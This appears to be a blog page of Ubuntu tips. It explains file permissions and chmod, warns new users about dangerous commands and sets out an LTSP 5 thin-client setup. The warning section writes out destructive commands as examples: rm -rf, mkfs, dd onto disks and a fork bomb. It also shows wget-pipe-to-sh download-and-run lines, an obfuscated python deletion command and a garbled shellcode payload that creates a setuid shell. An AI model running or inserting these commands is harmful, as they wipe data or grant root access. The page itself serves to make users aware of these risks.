ubuntu linux

Reading file and directory permissions with: ls -sl

* Reading file and directory permissions with: ls -sl
!Example
4 drwxr-x— 2 user user 4096 Feb 17 15:04 images/
4 -rw-rw-r– 1 user user 624 Feb 11 09:08 index.htm
4 drwxr-xr-x 2 user user 4096 Feb 17 15:04 public/
4 -rwxrwxrwx 2 user user 4096 Feb 17 15:04 foo.txt
!
o There are 10 location in the permission string:
1) First location is either d (directory) or - (file)
2) Read permission for User (1st name, fourth column)
3) Write permission for User
4) Execute permission for User
5) Read permission for Group (2nd name, fifth column)
6) Write permission for Group
7) Execute permission for Group
Read permission for Global (everyone)
9) Write permission for Global
10)Execute permission for Global

o In the above example, the directory images/ has read-write-execute permissions for the User user,read-execute permissions for the Group user, and no permissions for Global. No person except for the User user may make changes to this directory.

o The file index.htm has read-write permissions for the User and Group, is readable by Global, and eexecutable by nobody.

o The directory public/ has the same User and Group permissions as images/, but this directory may be read or executed by Global.

o The file foo.txt has read-write-execute permissions for User, Group, and Global

* Setting permissions with: chmod

o Useage: chmod ### foo
o # is set by summing the allowable permissions using the mapping:
oo 1 - Execute
oo 2 - Write
oo 4 - Read

!Examples
o To set the permissions for images/: chmod 750 images/
o To set the permissions for index.htm: chmod 664 index.htm
o To set the permissions for public/: chmod 755 public/
o To set the permissions for foo.txt: chmod 777 foo.txt

These are some of those command which is likely to damage your Ubuntu operating system!

Please DO NOT use any of them with out proper knowledge , just read it!

sudo rm -rf / (will delete all your files on your system) - required administrator rights!
sudo rm -rf . (will delete the current directory your in) - required administrator rights!
sudo rm -rf * (will delete all the files in the current folder) - required administrator rights!
rm -rf * or rm -rf *.* ( will delete all the files in the current folder) - No administrator rights needed!
rm -rf ~/ & ( will destroy your home directory) - No administrator rights needed

Commands which will erase your harddisk!

sudo mkfs (will format your hard drive) - required administrator rights!
sudo mkfs.ext3 ( will format your hard drive) - required administrator rights!
sudo mkfs.bfs ( will format your hard drive) - required administrator rights!
sudo mkfs.cramfs ( will format your hard drive) - No administrator rights needed!
sudo mkfs.ext2 (will format your hard drive) - required administrator rights!
sudo mkfs.minix (will format your hard drive) - required administrator rights!
sudo mkfs.msdos (will format your hard drive) - required administrator rights!
sudo mkfs.reiserfs (will format your hard drive) - required administrator rights!
sudo mkfs.vfat (will format your hard drive) - required administrator rights!

The dd command can be very dangerous, especially when you have no idea what it does! Below are some examples, but remember that these can vary often!
sudo dd if=/dev/zero of=/dev/hda (MOST DANGEROUS COMMAND! It will zero out the whole primary IDE hard drive) ( required administrator rights)
sudo dd if=/dev/hda of=/dev/hdb (Needs administrator rights)
sudo dd if=something of=/dev/hda (Needs administrator rights)
WARNING: /dev/hda and /dev/hdb from the above example can be replaced with /dev/sda or /dev/sdb in the case of SATA and SCSI.

Block device manipulation: Causes raw data to be written to a block device. Often times this will strike violently the filesystem and cause total loss of data!
any_command > /dev/sda
dd if=something of=/dev/sda

Forkbomb : It is a malicious script that will execute a number of processes until your system freezes, this will force you to do a hard reboot which may cause damage to your system.

The below command looks really intriguing and curiosity may lead new and inexperienced users to execute it! DON’T EXECUTE THEM!

CODE :
:(){:|:&};:
CODE :
fork while fork

Tarbomb: Let’s say that somebody who wants to help you, he offer a tar.gz or tar.bz2 archive and asks you to extract it into an existing directory. This archive can be crafted to explode into a billions of files, or inject other existing files into the system by guessing their filenames. You should make the habit of decompressing tar.gz or tar.bz2 archives inside a newly created empty directory!

Decompression bomb: Here’s another example. Let’s say somebody asks you to extract an archive which appears to be a small download. In reality it’s highly compressed data and will inflate to hundreds of Gigabites, filling your hard drive until it freezes! You should not touch data from an untrusted source!

Shellscript: This one is very dangrous! Somebody gives you a link to download, to a shellscript and then they will asks you to execute it. This script can contain dangerous command he chooses, and that will damage your system . Do not execute code from people you don’t trust! Here are some examples:
CODE :
wget http://my_site/my_file
sh ./some_file
Example :
wget http://ceattingal.ac.in/malicious-script
sh ./malicious-script
or
wget http://my_site/my_file -O- | sh
Example :
wget http://ihrd.org/malicious-script -O- | sh

Compiling code: Some person gives you the source code to an application and tells you to compile it. It is easy to hide dangerous codes in side large wad of source code, the attacker can easly damage your system. So Do not compile or execute the compiled code unless the source is of some well-known application, obtained from a reputable site.

A famous example I have seen on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. There was this payload:

CODE :
char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “xebx3ex5bx31xc0×50x54×5ax83xecx64×68″
“xffxffxffxffx68xdfxd0xdfxd9×68x8dx99″
“xdfx81×68x8dx92xdfxd2×54x5exf7×16xf7″
“x56×04xf7×56x08xf7×56x0cx83xc4×74x56″
“x8dx73×08x56×53x54×59xb0×0bxcdx80×31″
“xc0×40xebxf9xe8xbdxffxffxffx2fx62×69″
“x6ex2fx73×68x00×2dx63×00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

To the new and inexperienced computer user, this looks like the “hex code gibberish stuff” that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root.

Here’s another example of code that should definitely NOT be executed by anyone!

CODE : python -c ‘import os; os.system(”".join([chr(ord(i)-1) for i in “sn!.sg!+”]))’

Where “sn!.sg!+” is simply rm -rf * shifted a character up.

It is just for awareness of new and inexperienced users , You must know the above commands, don’t try them with out any proper knowledge. Good Luck

When you set up LTSP on Ubuntu 8.04 you will notice that it is very easy to get going in LTSP 5. Most of the configuration is automatically done for you. Install the Ubuntu 8.04.1 Desktop CD. You must have a graphical interface running on the server to be provided for the clients. Once you have installed the Desktop, be sure your network is set to operate on a static IP Address. Next you will need to install several programs required for the ltsp setup.

sudo apt-get install ltsp-server-standalone openssh-server

Create your Thin Client environment on the server with this command:

sudo ltsp-build-client

Update the Desktop System

sudo apt-get update

sudo apt-get upgrade

Configure DHCP
You will supply IP Addresses to the thin clients using DHCP. The file you want to edit is /etc/ltsp/dhcpd.conf. Note this is not the normal dhcpd.conf file that you would edit, this is a special file for LTSP only.

Here is a partial example file. The first line ensures that clients will use this DHCP server:

authoritative;

The subnet is declared with the network and netmask:

subnet 192.168.7.0 netmask 255.255.255.0 {

The next line which is indented is the range that your DHCP server will supply. So on this network example you could have static IP Addresses from 192.168.7.1-192.168.7.124 and then the range will define what dynamic IPs will be supplied by the DHCP server.

range 192.168.7.125 192.168.7.246;

It is a good idea to provide a DNS server for the clients:

option domain-name-servers 12.32.34.32;

Define the broadcast address:

option broadcast-address 192.168.7.255;

The optional router will also be the gateway for your network:

option routers 192.168.7.2;

Now you can set up individual diskless workstations. In these examples the hostname for the workstation is declared:

host ws205 {

Because you want to declare these hosts it is important that you modify your /etc/hosts file so the workstation is listed there. Here the workstation number is tied to the IP Address on the network so that it is easy to trouble shoot as you know right where to go to fix either a network problem or a hardware issue.
—cut—

ws202 192.168.7.202

ws203 192.168.7.203

ws205 192.168.7.205

ws206 192.168.7.206

—cut—

The hardware MAC address for each network card is listed so that you can tie the IP to a specific diskless workstation.

hardware ethernet 00:13:90:00:D7:8F;

The fixed IP Address is noted.

Fixed-address 192.168.7.205;

Finally a location to get the image for the diskless workstation is provided.

filename “/ltsp/i386/pxelinux.0″;

That is the configuration for the clients as they will boot

#

# Default LTSP dhcpd.conf config file.

#

authoritative;

subnet 192.168.7.0 netmask 255.255.255.0 {

range 192.168.7.125 192.168.7.246;

option domain-name-servers 12.32.34.32;

option broadcast-address 192.168.7.255;

option routers 192.168.7.2;

host ws205 {

hardware ethernet 00:13:90:00:D7:8F;

fixed-address 192.168.7.205;

filename “/ltsp/i386/pxelinux.0″;

}

host ws247 {

hardware ethernet 00:13:90:00:67:AF;

fixed-address 192.168.7.247;

filename “/ltsp/i386/pxelinux.0″;

—cut—

When you have finished restart the server. Run these commands to update your ssh keys.

sudo ltsp-update-sshkeys
sudo ltsp-update-image

Be sure to do it in that order.